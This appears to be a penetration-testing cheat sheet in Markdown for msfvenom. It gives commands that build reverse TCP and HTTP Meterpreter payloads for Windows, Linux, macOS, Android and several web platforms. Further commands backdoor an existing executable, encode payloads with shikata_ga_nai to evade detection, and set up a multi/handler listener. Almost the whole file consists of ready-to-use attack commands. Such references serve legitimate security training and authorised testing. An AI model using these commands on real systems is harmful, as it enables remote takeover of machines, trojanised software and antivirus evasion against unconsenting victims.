cyber-security-resources/post_exploitation/msfvenom.md
2021-07-18 23:17:24 -04:00

93 lines
2.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# MSFVenom
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
## Creating Binaries
The following create different binaries for meterpreter and reverse TCP shells:
### Creates a Reverse TCP Meterpreter Shell - Payload for Windows
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe
```
### Creates a simple HTTP Payload for Windows
```
msfvenom -p windows/meterpreter/reverse_http LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe
```
### Creates a simple TCP Shell for Linux
```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f elf > payload.elf
```
### Creates a simple TCP Shell for Mac
```
msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > example.macho
```
### Creates a simple TCP Payload for Android
```
msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk
```
## Web Payloads
### Creates a Simple TCP Shell for PHP
```
msfvenom -p php/meterpreter_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.php
```
### Creates a Simple TCP Shell for ASP
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f asp > example.asp
```
### Creates a Simple TCP Shell for Javascrip
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.jsp
```
### Creates a Simple TCP Shell for WAR
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f war > example.war
```
## Windows Payloads
### Lists all avalaible encoder
```
msfvenom -l encoders
```
### Binds an exe with a Payload (Backdoors an exe)
```
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe
```
### Creates a simple TCP payload with shikata_ga_nai encoder
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b \x00 -i 3 -f exe > example.exe
```
### Binds an exe with a Payload and encodes it
```
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe
```
## Getting a Metepreter Shell
```
omar@ares:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
```